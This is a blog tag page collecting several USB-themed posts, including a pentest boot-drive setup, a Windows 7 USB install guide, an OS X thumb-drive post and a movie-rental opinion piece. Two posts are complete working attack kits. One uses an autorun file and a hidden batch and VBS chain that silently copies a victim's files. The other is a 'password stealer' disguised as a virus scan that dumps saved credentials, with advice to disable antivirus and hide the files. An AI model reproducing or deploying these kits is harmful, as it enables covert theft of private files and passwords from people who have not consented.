Posts Tagged ‘USB’

In this guide, I’ll walk you through setting up a pentesting USB drive that also works well for other IT professionals.

Fortunately, the days of carrying around a CD binder full of your various tools are long gone. With the lower prices of USB drives and their increased capacity, you can easily keep a large number of tools at your disposal.

About this Guide: This guide is intended for educational purposes only. The author of this guide is not responsible for misuse, damaged, loss, altered, files and hardware.

What You’ll Need:

  • A USB drive (The larger the better. You can occasionally find a 128 GB drive for as little as £25)
  • Internet connection (Which I am going to assume that you have if you are reading this)

First let’s head over to grab Yumi. Yumi is a multi-boot loader for USB drives and the primary tool we’ll be using. Yumi allows you to easily add and remove programs without having to wipe out your drive.

Download Yumi at: http://www.pendrivelinux.com/yumi-multiboot-usb-creator/

Next, plug in your USB drive into your computer and launch Yumi

Click on the “I Agree”

Click on the down arrow and select your drive
step 2_zpspjunqz10

On the right side of the menu, we have the option of formatting the USB drive, View, ADD, or Remove distributions. I’m going to assume you have a clean USB drive.

Next, we’re going to click the drop-down arrow listed on Yumi’s “Step 2”. As we can see, there are a large number of programs listed here.

step 12_zpscby51rjc

As this is going to be my penetration testing USB toolkit, and I’m a big fan of Kali Linux, so that’s what I’m going to select first.

With Yumi, you have two options to install these programs to your drive. You can either download the ISO ahead of time, or for convenience, you can click the “open download link” option. This will obviously open the program’s download link for you, saving you time searching for it.

One we have our ISO downloaded click on the “Browse” button:

Click on ISO

Click “Open”

Click the “Create” button

“Yes”to get started

Depending on how large the ISO will determine how much time it takes. You should see a dialogue box telling you how the install is progressing.

Once your ISO is ready, click “Next”

From here, you’ll have the option to load additional ISO’s to your drive. If you decide to load additional programs, simply follow the above steps.

Another great feature about Yumi is that if you have a particular ISO that you want loaded and it’s not listed in their menu, it’s no problem! Follow the instructions as if you were going to install any other ISO, when it’s time to select your ISO scroll to the bottom of the list. The option that I normally select is “Try Unlisted ISO (via SYSLINUX).

We have all the programs we want loaded by way of Yumi. What’s next? Well, we have a pretty good toolset now, but there is always room for improvement.

Keeping with the idea of a portable toolset and keeping the entire thing free (minus the cost of your USB drive), our next stop is Portable apps http://portableapps.com/.

If you never have used this program or heard of it before, Portable apps, as the name implies, is a set of portable tools that can be launched from your USB drive. The great thing about this is you can take all of your favorite apps to another person’s computer without installing it to their machine.

After downloading Portable apps let’s go ahead and launch it.

The initial install is pretty straight forward, so simply click through.

When we reach the “Install Type,” we’re going to choose “Custom Install”.

The next option gives us a wide range of locations to install to.

For this guide, we’re going to choose the first option, “Portable”.

Make sure you have your USB drive selected and click “Next” and “Install” (You may need to turn your anti-virus off for this if it’s set to block autorun.)

After the program installs you will be presented with a list of software. Simply select which programs that you want to install and click “Next”.

To launch the application, open your USB drive and click on “Start”

The last program that we’re going to install is similar to Portable apps. This one is called NirLauncher. The reason I include this one (in addition to Portable apps) is that it has a number of tools that can be useful for penetration testing. It’s also free and updated frequently.

You can download the software at: http://launcher.nirsoft.net/

This one is far easier and faster to setup since the installer has all of the programs pre-installed. Simply download the program and unzip it to your USB drive.

To launch NirLauncher simply open your USB drive and click on “NirLauncher”

step 17_zpsnbnlrzlo

We’ve seen how to launch the other 2 programs; let’s take a look at booting our primary drive. Plug your USB drive into the computer you want to boot off of and have it boot from the USB drive. Depending on how the BIOS is configured, you may need to interrupt the boot sequence and select the drive. If your drive still does not show up or is not a option, you’ll probably need to login to the BIOS and make sure that USB boot is not disabled.

When the drive does boot, you’ll see the menu screen. Simply navigate to the program you want to run and hit the “Enter” key.

Bonus – Customizing Yumi

If you wish to create a custom image for the Yumi menu, open your USB drive and then open the “multiboot” folder. There, you’ll find a .png file called “yumi”. Edit this file however you wish. Make sure the resolution, name and extension match the original.

Yumi is a very powerful tool. We can use it to boot to our own custom OS without touching the host machine. We can use it for data recovery, forensics, password hacking, hardware scanning, etc. – all for the cost of a single USB drive.

tv crime2Please use responsibly, Caintech.co.uk take no responsibility for the use of the following information it should only be used for educational purposes

How to steal files with USB

For this you’ll need a USB device or anything that will plug into a PC and can hold data.

Step One-

Open Notepad and paste the code below

[autorun]
icon=icon.ico
open=explorer.bat
action=Open folders to view files
shell\open\command=launch.bat

Save it as Autorun.inf
paste to the USB an icon called icon.ico
change the “Open folders to view files”.

Step Two-

Open notepad again and paste the code below

@echo on
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo on

%backupcmd% “%USERPROFILE%\Desktop\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\private\favorites”
%backupcmd% “%USERPROFILE%\Desktop\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.jpeg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.wmv” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Contacts” “%drive%\private\contacts”
%backupcmd% “%USERPROFILE%\Links” “%drive%\private\links”
%backupcmd% “%USERPROFILE%\My Documents\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\Downloads” “%drive%\private\downloads”
%backupcmd% “%USERPROFILE%\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mpg” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Pictures” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Videos” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\Downloads” “%drive%\private\downloads”
%backupcmd% “D:\*.jpg” “%drive%\private\img”
%backupcmd% “D:\*.jpeg” “%drive%\private\img”
%backupcmd% “D:\*.bmp” “%drive%\private\img”
%backupcmd% “D:\*.3gp” “%drive%\private\vid”
%backupcmd% “D:\*.mp4” “%drive%\private\vid”
%backupcmd% “D:\*.avi” “%drive%\private\vid”
%backupcmd% “D:\*.wmv” “%drive%\private\vid”
%backupcmd% “D:\*.doc” “%drive%\private\documents”
%backupcmd% “D:\*.pdf” “%drive%\private\documents”
@echo on
cls

Save it as explorer.bat
this script copies files from Music/Videos/downloads/

Then these files are copied to their respective folders.
Note: create on your USB a folder called private
and on this folder create these folders:
contacts
documents
downloads
favourites
img
links
mp3
vid

Step 3

Open notepad again and paste the code below

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save it as invisible.vbs
This code runs explorer.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

Step Four

Open notepad again for the last time and paste the code below

wscript.exe \invisible.vbs explorer.bat

Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with explorer.bat so file.bat is run with code from vbs file.

Step Five

Paste all 4 files in the root of your flash drive. Don’t forget to paste the icon
Create the folders I mentioned in step 2.
If you want you can make the files and folders hidden so they won’t be visible 🙂
Note: This will work only if your target will click “Open folders to view files” so in order for this to work auto run must be enabled or you can get them to double click the icon.

(-_(-_(-_-)_-)_-)

Caintech.co.uk

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview – IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) –  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

Window 7 is the one of the best OS system which is used by the people all over the world and with greater popularity of this OS system every one want to install window 7 in their PC normally everyone know that how to install window 7 using DvD but one of the hottest question which i saw in many forums is “How to Install Windows 7 from a USB Drive” .i will give you the step to step tutorial to install Windows 7 from a USB Drive.

By using this method you can save lots of your valuable time as to Installs from a flash drive tend to take about 75% of the time it takes with a DVD.It will took 20 minutes instead of 30 minute which is took by DVD .
Here we start a process to install Windows 7 from a USB Drive just follow simple steps show below:
1. First of all you have USB Drive,which must be at least 4 GB.
2.Plug the drive into your PC.
3.After that open a command prompt as administrator. (Right click, Open as Admin, or Ctrl+Shift+Click)
4.Get the drive number by typing:
Diskpart => List disk => In my PC USB disk was number 1.
5.After doing just Format the drive by typing:
Select disk 1 => clean => Create partition primary => Select partition 1 => Active => Format fs NTFS => assign => Exit
6.After that mount the Windows 7 beta iso or insert the disk.
7.Then you can copy everything from the Windows 7 installation DVD/iso onto the USB key (a simple drag and drop will do).
8.Now you can insert the thumb drive into the system you want to install Windows 7 onto and boot the system. The installation will now proceed as usual—but faster.
Now wasn’t that easy.

There are tons of awesome live, bootable Linux systems, but what if you need to run OS X? Reader Will shows us how to put a portable version of OS X on a thumb drive and boot it on (most) Intel computers.

People put linux on their flash drives all the time. They also get hackintosh on their hard drives quite often. However, it’d be nice to be able to get the same live experience we get with Linux using OS X. With a distribution of OS X 10.6.2 called iPortable Snow, we can.

You’ll need an actual Mac to create the thumb drive (some Hackintoshes may work; mine didn’t). Search your favorite torrent site for iPortable Snow and download it. While it’s downloading, format your external hard drive or thumb drive (You’ll need at least an 8 GB thumb drive for this). Open up Disk Utility and select the drive you want to put OS X on. Go to the Partition tab and create one partition, formatted as Mac OS Extended (Journaled). Hit Options and make sure you’re using the Master Boot Record option. Then hit Apply to format the drive.

To read more about this fascinating subject have a look at Lifthacker.com

Blockbuster might want to put some extra polish on that new advertising campaign. There’s apparently a new service around the corner called “Flix On Stix” that uses a kiosk model similar to Redbox, only instead of getting a DVD, you simply plug in a USB thumb drive and download the movie rental in seconds. Maybe Redbox should start planning a new advertising campaign too? Or is this new technology destined to go obsolete almost as soon as it begins? Let’s weigh the pros and cons.

 

Pros
·Selection – A kiosk should have room for enough hard drives to store thousands of movies, so hopefully you won’t be limited to new releases of the last few months. If anything can give these kiosks an edge, it will be finding user-friendly ways to exploit this advantage.

·No DVD Rental Headaches – Since the movie deletes itself after the rental period, you don’t have to rush back to return anything. No late fees either. Also, since we’re dealing with data, you won’t end up with a scratched disk and nothing will be checked out. Take that Redbox!

Cons
·Actually Watching What You Rent – According to my research on different online electronics sites, most new Blu-ray players have USB inputs. A little more than half of televisions do, and it’s still a rarity with DVD players. Most likely, these numbers will increase rapidly. Cool! But, what if you didn’t buy a new TV or Blu-ray player in the last few years? Unless you have a cord or some wireless way to beam your computer’s desktop to your television, you’re stuck watching movies on your computer. Fine for some, but not ideal for watching movies with others. Or you can buy a Flix On Stix box, the price of which has not yet been announced.

·The Internet – And here’s the killer. Redbox still makes sense for people who don’t want to mess with newfangled equipment like Rokus and Apple TV and the like. But are those same technology-phobic people going to want to deal with USB drives? Also, not only are most Blu Ray players equipped with USB imports, but almost all models are Wifi ready. That means people can access online streaming and downloading with their home theater, which seems even easier than going to a kiosk.

The Verdict:
It’s a good idea, but if technology keeps developing at it’s current pace, the entire target market for this type of rental will have their internet connected to their home theater soon. With so many streaming, downloading and on-demand options available this way, it seems like Flix On Sticks may be obsolete within a year or so under its current model. Come to think of it, Redbox might want to watch their back too.

But let’s hear your thoughts. Are USB rentals a Godsend or a gimmick that will fade fast?

Whether you’re trying to increase your security at an internet café, tunnel your way to your home computer from your cubicle, or leave no trace on your friend’s borrowed computer, a flash drive turned portable privacy toolkit is invaluable.

Flash drives are enormously handy for carting around files, taking portable applications with you, and serving as a mobile computing base when you’re away from home. They’re also excellent tools for increasing your privacy when you’re away from your home computer. Below I’ll point you toward methods of setting up secure connections with SSH and round up a few of your best options for SSH-friendly applications; then we’ll look into encrypting data, permanently erasing data, and otherwise covering your tracks on any machine you’re using.

Before we begin, a big fat disclaimer is in order. Working from a flash drive privacy toolkit, in most situations, is rife with compromises. There is no way to, for example, set up a totally bulletproof system for browsing privately and anonymously from work. You can dodge IT, you can encrypt and tunnel, you can worm your way around security measures, and you might even be able to do it without getting caught. Doing so is grounds for termination at many company, however, and the IT admins frown heavily on users who punch holes in the firewall. If you absolutely must alleviate the boredom of your workday by streaming music from your home PC or browsing “off record” from your office, your best bet is to bring a netbook and tether it to your cellphone so all your activity occurs completely off the company networks and remains undetectable by your corporate overlords.

All of that said, the following tricks and applications push the limits of what the humble flash drive and non-administrative rights can do. We know you’ll find more than a few tricks that will make life from your flash drive toolkit more secure and your computer activities more private.

Read More